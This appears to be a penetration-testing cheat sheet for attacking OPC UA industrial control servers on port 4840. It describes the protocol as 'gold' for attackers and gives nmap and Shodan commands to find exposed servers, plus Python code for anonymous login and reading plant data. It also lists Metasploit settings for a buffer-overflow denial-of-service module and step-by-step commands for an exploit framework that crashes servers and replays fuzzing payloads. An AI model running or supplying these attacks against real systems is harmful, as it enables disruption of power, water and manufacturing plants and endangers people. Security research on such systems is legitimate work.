OPC UA - PORT 4840

Basic info

• A machine-to-machine communication protocol for industrial control systems (ICS).

• Standard port: 4840/TCP.

• Used in:

  • Manufacturing lines

  • Power & energy networks

  • Oil & gas

  • Water plants

• Provides structured data exchange between PLCs, sensors, and control software.

For attackers, this is gold: a single OPC UA server can expose device data, configurations, and control endpoints.

Enumeration

Nmap Scan

nmap -sV -p 4840 <target>

Output:

4840/tcp open  opc-ua  OPC UA TCP Protocol

Banner Grab & Enumeration

Use the opcua-info NSE script:

nmap -p 4840 --script opcua-info <target>

This extracts:

• Server application name

• Security policies supported (None, Basic256, etc.)

• Endpoints & available services

To reveal security issues in OPC UA servers, scan it with OpalOPC.

opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port

Shodan / Censys

Search for:

port:4840 opc ua

Exploitation

Once you find an OPC UA server, you have multiple attack routes:

1. No Authentication (Anonymous Login)

Many deployments allow anonymous access. Use the Python opcua client:

from opcua import Client

client = Client("opc.tcp://<target>:4840")
client.connect()
print("Connected:", client.get_endpoints())

2. Information Disclosure

OPC UA servers expose tags, variables, and node data. This can reveal:

• Factory layout

• Device models & firmware versions

• Process values (temperatures, flow rates, etc.)

Example Python snippet:

root = client.get_root_node()
print("Root children:", root.get_children())

3. Vulnerabilities (CVE-2018-4840 & more)

Poor implementations of OPC UA are vulnerable to buffer overflows and denial of service.

Metasploit has a module:

use auxiliary/dos/opcua/opcua_extensionobject_bof
set RHOSTS <target>
set RPORT 4840
run

This can crash or prove exploitability in vulnerable stacks. With ROP chains, it becomes RCE.

Automated Tools

Claroty’s OPC UA Exploit Framework is a research toolkit for fuzzing, testing, and exploiting OPC UA servers/clients. It was the backbone of Team82’s discovery of dozens of OPC UA vulnerabilities.

Installation & How to guide

# Clone the repo
git clone https://github.com/claroty/opcua-exploit-framework.git
cd opcua-exploit-framework

# Install requirements
pip install -r requirements.txt

⚠️ Make sure you’re running Python 3.8+ and have pip installed.

The framework has four modules:

• sanity → Simple probes

• attacks → Exploit payloads

• corpus → Saved fuzz cases

• server → Fake OPC UA server for testing

1. Run a Sanity Test (check target is alive)

python3 main.py sanity --target opc.tcp://192.168.1.100:4840

This checks if the OPC UA service is responding.

2. Enumerate Nodes

python3 main.py sanity read-nodes --target opc.tcp://192.168.1.100:4840

Useful for info-gathering on exposed objects.

3. Launch an Attack

Example: Remote Stack Overflow (DoS)

python3 main.py attacks dos-basic --target opc.tcp://192.168.1.100:4840

If the server crashes → it’s vulnerable.

4. Reuse Payloads (Corpus)

python3 main.py corpus --payload payloads/bad_integer.bin --target opc.tcp://192.168.1.100:4840

This lets you replay fuzzing payloads that previously triggered bugs.

5. Use the Built-in Test Server

python3 main.py server --port 4840